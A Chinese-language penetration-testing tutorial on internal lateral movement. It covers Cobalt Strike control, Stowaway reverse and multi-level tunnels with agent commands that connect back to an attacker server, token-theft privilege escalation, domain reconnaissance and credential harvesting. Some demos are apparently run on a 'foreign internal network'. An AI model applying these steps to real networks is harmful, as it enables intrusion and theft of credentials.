一文学会内网横向
字数 1352 2025-09-01 11:26:03
内网横向渗透技术详解
前言
本文详细讲解内网横向渗透技术,涵盖权限获取、隧道搭建、权限提升和信息收集等关键环节,结合国外内网环境和本地内网靶机环境进行实战演示。
1. 权限获取
1.1 初始入侵方式
- 通过Weblogic漏洞获取初始shell权限
- 使用Cobalt Strike(CS)进行控制
- 上线方式:
- 远程下载exe文件上线
- web投递上线(演示采用此方式)
2. 隧道搭建
2.1 反向隧道(国外内网演示)
适用场景:目标机器可以出网
工具选择:
- frp
- nps
- Stowaway(演示采用此工具)
实施步骤:
-
服务端配置(攻击者机器):
./linux_x64_admin -l 5555 -s 7777-l:监听端口-s:密钥
-
被控端配置(目标机器):
windows_x64_agent.exe -c 192.168.21.128:5555 -s 7777 --reconnect 10-c:服务端IP与端口-s:与服务端相同的密钥--reconnect:重连间隔
-
连接管理:
- 服务端收到连接请求后,连接节点
- 设置socks端口
- 使用Proxifier连接隧道并配置代理规则
2.1.1 多级代理(本地内网靶机演示)
环境说明:
- 网段:192.168.2.x、192.168.3.x、192.168.21.x
- 192.168.21.x模拟外网网段
实施步骤:
-
第一级代理:
- 服务端a启动(192.168.21.x)
- 被控机b连接(192.168.2.x,192.168.21.x)
- 服务端收到连接后执行:
use 0 socks 7788 - 成功搭建被控机b网段的隧道
-
第二级代理:
- 被控机c(只有192.168.2.x,192.168.3.x网段)
- 服务端a执行:
输入1,输入监听端口7732use 0 listen - 被控机c执行连接命令(192.168.2.11为被控机b的IP,-s密钥与服务端a一致)
- 服务端a执行:
back detail use 1 socks 6677 - 再次设置代理服务器及代理规则,完成多级隧道搭建
2.2 正向隧道(本地内网靶机演示)
适用场景:目标机器不出网
工具选择:
- sou5
- neoreg(演示采用sou5)
实施步骤:
- 目标服务器上传sou5代码
- 本机连接目标的sou5文件
- 通过Proxifier连接隧道
3. 权限提升(国外内网演示)
注意:实际中administrator权限通常已足够,但有时需要system权限
3.1 提权方法
-
Cobalt Strike插件提权:
- 进程注入
- 令牌窃取
- 以system权限上线CS
-
土豆系列工具:
- 上传potato等提权工具进行提权
-
进程操作:
- 查看进程列表
- 挑选高权限进程进行令牌注入或进程窃取
4. 信息收集(国外内网演示)
4.1 基础信息收集命令
ipconfig # 查看IP信息
arp -a # 查看路由表
systeminfo # 查看系统信息
type C:\Windows\System32\drivers\etc\hosts # 查看hosts文件
net time /domain # 查看当前域
net view /domain # 查看当前域
nltest /domain_trusts # 判断单域或多域
setspn -q */* # 查看域SPN信息
net group "Domain Computers" /domain # 查看域组成员
4.2 其他信息收集方法
-
服务器配置文件检查:
- 查找数据库账号密码等敏感信息
- 检查浏览器、xshell、todesk等软件的配置文件
-
密码收集工具:
- Pillager
- searchall
-
域控信息获取:
- 通过
net time /domain获取域控信息 - 通过
arp -a分析路由表
- 通过
总结
本教程详细介绍了内网横向渗透的全流程,从初始权限获取到隧道搭建,再到权限提升和信息收集。关键点包括:
- 根据目标网络环境选择合适的隧道方式(反向/正向)
- 多级代理技术在内网穿透中的应用
- 多种权限提升方法的灵活运用
- 全面的信息收集策略
实际渗透测试中,应根据目标环境特点灵活组合这些技术,并注意隐蔽性和权限维持。